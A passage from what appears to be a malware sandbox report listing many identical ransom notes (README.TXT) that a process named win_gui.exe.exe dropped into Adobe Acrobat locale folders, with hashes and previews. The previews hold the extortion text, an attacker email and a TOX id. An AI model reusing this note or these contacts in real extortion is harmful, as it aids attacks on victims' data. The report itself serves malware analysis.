                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
